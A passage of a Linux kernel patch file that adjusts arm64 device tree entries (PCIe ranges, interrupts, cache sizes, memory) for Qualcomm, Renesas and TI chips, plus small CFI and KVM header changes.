+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			ranges = <0x01000000 0x0 0x34200000 0x0 0x34200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x34200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x34300000 0x0 0x34300000 0x0 0x1d00000>;
+ 			bus-range = <0x00 0xff>;
+ 
+@@ -1198,7 +1198,7 @@
+ 			reg-names = "parf", "dbi", "elbi", "atu", "config";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			ranges = <0x01000000 0x0 0x38200000 0x0 0x38200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x38200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x38300000 0x0 0x38300000 0x0 0x1d00000>;
+ 			bus-range = <0x00 0xff>;
+ 
+@@ -1295,7 +1295,7 @@
+ 			reg-names = "parf", "dbi", "elbi", "atu", "config";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			ranges = <0x01000000 0x0 0x3c200000 0x0 0x3c200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x3c200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x3c300000 0x0 0x3c300000 0x0 0x1d00000>;
+ 			bus-range = <0x00 0xff>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index f36c23e7a2248..c8b54e401eb98 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -198,7 +198,7 @@
+ 			reg = <0x0 0x0>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -222,7 +222,7 @@
+ 			reg = <0x0 0x100>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -243,7 +243,7 @@
+ 			reg = <0x0 0x200>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -264,7 +264,7 @@
+ 			reg = <0x0 0x300>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -2226,8 +2226,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0xd00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0xd00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -2331,7 +2331,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_EDGE_RISING>;
+@@ -2705,7 +2705,7 @@
+ 				};
+ 			};
+ 
+-			qspi_data12: qspi-data12 {
++			qspi_data23: qspi-data23 {
+ 				pinmux-data {
+ 					pins = "gpio93", "gpio94";
+ 					function = "qspi_data";
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index f790223ed8f5a..d338a987e8868 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1783,8 +1783,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1879,7 +1879,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_EDGE_RISING>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index 927032863e2f1..d3f2f617047f1 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -1807,8 +1807,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 142 IRQ_TYPE_LEVEL_HIGH>,
+@@ -1916,7 +1916,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+@@ -2024,7 +2024,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x64200000 0x0 0x64200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x64200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x64300000 0x0 0x64300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 243 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts b/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
+index 9c4cfd995ff29..e87514d8fd84e 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
++++ b/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
+@@ -341,6 +341,9 @@
+ 
+ &usb_1 {
+ 	status = "okay";
++};
++
++&usb_1_dwc3 {
+ 	dr_mode = "peripheral";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index 16a73288c1b37..d86ee3dd2270a 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -1726,8 +1726,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1835,8 +1835,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0 0x40200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x40300000 0 0x40300000 0x0 0x1fd00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1883,8 +1883,8 @@
+ 			phys = <&pcie1_lane>;
+ 			phy-names = "pciephy";
+ 
+-			perst-gpio = <&tlmm 97 GPIO_ACTIVE_LOW>;
+-			enable-gpio = <&tlmm 99 GPIO_ACTIVE_HIGH>;
++			perst-gpios = <&tlmm 97 GPIO_ACTIVE_LOW>;
++			wake-gpios = <&tlmm 99 GPIO_ACTIVE_HIGH>;
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie1_default_state>;
+diff --git a/arch/arm64/boot/dts/renesas/r8a774c0.dtsi b/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
+index 151e32ac03683..ec7c7851519f4 100644
+--- a/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
+@@ -49,17 +49,14 @@
+ 		opp-shared;
+ 		opp-800000000 {
+ 			opp-hz = /bits/ 64 <800000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1200000000 {
+ 			opp-hz = /bits/ 64 <1200000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 			opp-suspend;
+ 		};
+diff --git a/arch/arm64/boot/dts/renesas/r8a77990.dtsi b/arch/arm64/boot/dts/renesas/r8a77990.dtsi
+index 3053b4b214978..3ed31ffd73a28 100644
+--- a/arch/arm64/boot/dts/renesas/r8a77990.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a77990.dtsi
+@@ -49,17 +49,14 @@
+ 		opp-shared;
+ 		opp-800000000 {
+ 			opp-hz = /bits/ 64 <800000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1200000000 {
+ 			opp-hz = /bits/ 64 <1200000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 			opp-suspend;
+ 		};
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+index 3f7d451b11995..95817679b3884 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+@@ -80,9 +80,8 @@
+ 			reg = <0 0x10049c00 0 0x400>;
+ 			interrupts = <SOC_PERIPHERAL_IRQ(326) IRQ_TYPE_LEVEL_HIGH>,
+ 				     <SOC_PERIPHERAL_IRQ(327) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(328) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(329) IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <SOC_PERIPHERAL_IRQ(328) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -101,9 +100,8 @@
+ 			reg = <0 0x1004a000 0 0x400>;
+ 			interrupts = <SOC_PERIPHERAL_IRQ(330) IRQ_TYPE_LEVEL_HIGH>,
+ 				     <SOC_PERIPHERAL_IRQ(331) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(332) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(333) IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <SOC_PERIPHERAL_IRQ(332) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -121,10 +119,8 @@
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+ 			interrupts = <SOC_PERIPHERAL_IRQ(334) IRQ_TYPE_LEVEL_HIGH>,
+-				     <SOC_PERIPHERAL_IRQ(335) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(336) IRQ_TYPE_EDGE_RISING>,
+ 				     <SOC_PERIPHERAL_IRQ(337) IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -143,9 +139,8 @@
+ 			reg = <0 0x1004a800 0 0x400>;
+ 			interrupts = <SOC_PERIPHERAL_IRQ(338) IRQ_TYPE_LEVEL_HIGH>,
+ 				     <SOC_PERIPHERAL_IRQ(339) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(340) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(341) IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <SOC_PERIPHERAL_IRQ(340) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+index 487536696d900..6a42df15440cf 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+@@ -175,9 +175,8 @@
+ 			reg = <0 0x10049c00 0 0x400>;
+ 			interrupts = <GIC_SPI 326 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 327 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 329 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -196,9 +195,8 @@
+ 			reg = <0 0x1004a000 0 0x400>;
+ 			interrupts = <GIC_SPI 330 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 331 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 333 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -216,10 +214,8 @@
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+ 			interrupts = <GIC_SPI 334 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 335 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 336 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 337 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -238,9 +234,8 @@
+ 			reg = <0 0x1004a800 0 0x400>;
+ 			interrupts = <GIC_SPI 338 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 339 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 341 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+index 304ade54425bf..fea537d9fce66 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+@@ -175,9 +175,8 @@
+ 			reg = <0 0x10049c00 0 0x400>;
+ 			interrupts = <GIC_SPI 326 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 327 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 329 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -196,9 +195,8 @@
+ 			reg = <0 0x1004a000 0 0x400>;
+ 			interrupts = <GIC_SPI 330 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 331 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 333 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -216,10 +214,8 @@
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+ 			interrupts = <GIC_SPI 334 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 335 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 336 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 337 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -238,9 +234,8 @@
+ 			reg = <0 0x1004a800 0 0x400>;
+ 			interrupts = <GIC_SPI 338 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 339 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 341 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+diff --git a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+index ae1ec58117c35..0bdc16b0d08f2 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+@@ -461,7 +461,7 @@
+ 			     <193>, <194>, <195>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <87>;
++		ti,ngpio = <92>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 77 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 77 0>;
+@@ -478,7 +478,7 @@
+ 			     <183>, <184>, <185>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <88>;
++		ti,ngpio = <52>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 78 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 78 0>;
+diff --git a/arch/arm64/boot/dts/ti/k3-am625.dtsi b/arch/arm64/boot/dts/ti/k3-am625.dtsi
+index cea2cc7de5dd3..26d78562ceba7 100644
+--- a/arch/arm64/boot/dts/ti/k3-am625.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am625.dtsi
+@@ -147,7 +147,7 @@
+ 	L2_0: l2-cache0 {
+ 		compatible = "cache";
+ 		cache-level = <2>;
+-		cache-size = <0x40000>;
++		cache-size = <0x80000>;
+ 		cache-line-size = <64>;
+ 		cache-sets = <512>;
+ 	};
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+index 576dbce80ad83..b08a083d722d4 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
++++ b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+@@ -26,8 +26,9 @@
+ 
+ 	memory@80000000 {
+ 		device_type = "memory";
+-		/* 2G RAM */
+-		reg = <0x00000000 0x80000000 0x00000000 0x80000000>;
++		/* 4G RAM */
++		reg = <0x00000000 0x80000000 0x00000000 0x80000000>,
++		      <0x00000008 0x80000000 0x00000000 0x80000000>;
+ 	};
+ 
+ 	reserved-memory {
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a7.dtsi b/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
+index 331d89fda29d0..f1ebaec404fbc 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
+@@ -96,7 +96,7 @@
+ 	L2_0: l2-cache0 {
+ 		compatible = "cache";
+ 		cache-level = <2>;
+-		cache-size = <0x40000>;
++		cache-size = <0x80000>;
+ 		cache-line-size = <64>;
+ 		cache-sets = <512>;
+ 	};
+diff --git a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+index c935622f01028..bfa296dce3a31 100644
+--- a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+@@ -1180,7 +1180,6 @@
+ 		ti,itap-del-sel-mmc-hs = <0xa>;
+ 		ti,itap-del-sel-ddr52 = <0x3>;
+ 		ti,trm-icp = <0x8>;
+-		ti,strobe-sel = <0x77>;
+ 		dma-coherent;
+ 	};
+ 
+diff --git a/arch/arm64/crypto/aes-neonbs-core.S b/arch/arm64/crypto/aes-neonbs-core.S
+index 7278a37c2d5cd..baf450717b24b 100644
+--- a/arch/arm64/crypto/aes-neonbs-core.S
++++ b/arch/arm64/crypto/aes-neonbs-core.S
+@@ -15,6 +15,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/assembler.h>
+ 
+ 	.text
+@@ -620,12 +621,12 @@ SYM_FUNC_END(aesbs_decrypt8)
+ 	.endm
+ 
+ 	.align		4
+-SYM_FUNC_START(aesbs_ecb_encrypt)
++SYM_TYPED_FUNC_START(aesbs_ecb_encrypt)
+ 	__ecb_crypt	aesbs_encrypt8, v0, v1, v4, v6, v3, v7, v2, v5
+ SYM_FUNC_END(aesbs_ecb_encrypt)
+ 
+ 	.align		4
+-SYM_FUNC_START(aesbs_ecb_decrypt)
++SYM_TYPED_FUNC_START(aesbs_ecb_decrypt)
+ 	__ecb_crypt	aesbs_decrypt8, v0, v1, v6, v4, v2, v7, v3, v5
+ SYM_FUNC_END(aesbs_ecb_decrypt)
+ 
+@@ -799,11 +800,11 @@ SYM_FUNC_END(__xts_crypt8)
+ 	ret
+ 	.endm
+ 
+-SYM_FUNC_START(aesbs_xts_encrypt)
++SYM_TYPED_FUNC_START(aesbs_xts_encrypt)
+ 	__xts_crypt	aesbs_encrypt8, v0, v1, v4, v6, v3, v7, v2, v5
+ SYM_FUNC_END(aesbs_xts_encrypt)
+ 
+-SYM_FUNC_START(aesbs_xts_decrypt)
++SYM_TYPED_FUNC_START(aesbs_xts_decrypt)
+ 	__xts_crypt	aesbs_decrypt8, v0, v1, v6, v4, v2, v7, v3, v5
+ SYM_FUNC_END(aesbs_xts_decrypt)
+ 
+diff --git a/arch/arm64/include/asm/debug-monitors.h b/arch/arm64/include/asm/debug-monitors.h
+index 7b7e05c02691c..13d437bcbf58c 100644
+--- a/arch/arm64/include/asm/debug-monitors.h
++++ b/arch/arm64/include/asm/debug-monitors.h
+@@ -104,6 +104,7 @@ void user_regs_reset_single_step(struct user_pt_regs *regs,
+ void kernel_enable_single_step(struct pt_regs *regs);
+ void kernel_disable_single_step(void);
+ int kernel_active_single_step(void);
++void kernel_rewind_single_step(struct pt_regs *regs);
+ 
+ #ifdef CONFIG_HAVE_HW_BREAKPOINT
+ int reinstall_suspended_bps(struct pt_regs *regs);
+diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
+index 307a840b78865..f134c300cdcf1 100644
+--- a/arch/arm64/include/asm/kvm_host.h
++++ b/arch/arm64/include/asm/kvm_host.h
+@@ -191,6 +191,9 @@ struct kvm_arch {
+ 	/* Mandated version of PSCI */
+ 	u32 psci_version;
+ 
++	/* Protects VM-scoped configuration data */
++	struct mutex config_lock;
++
+ 	/*
+ 	 * If we encounter a data abort without valid instruction syndrome
+ 	 * information, report this to user space.  User space can (and
+@@ -482,6 +485,7 @@ struct kvm_vcpu_arch {
+ 
+ 	/* vcpu power state */
+ 	struct kvm_mp_state mp_state;
++	spinlock_t mp_state_lock;
+ 
+ 	/* Cache some mmu pages needed inside spinlock regions */
+ 	struct kvm_mmu_memory_cache mmu_page_cache;
+diff --git a/arch/arm64/include/asm/scs.h b/arch/arm64/include/asm/scs.h
+index ff7da1268a52a..13df982a08080 100644
+--- a/arch/arm64/include/asm/scs.h
++++ b/arch/arm64/include/asm/scs.h
+@@ -10,15 +10,16 @@
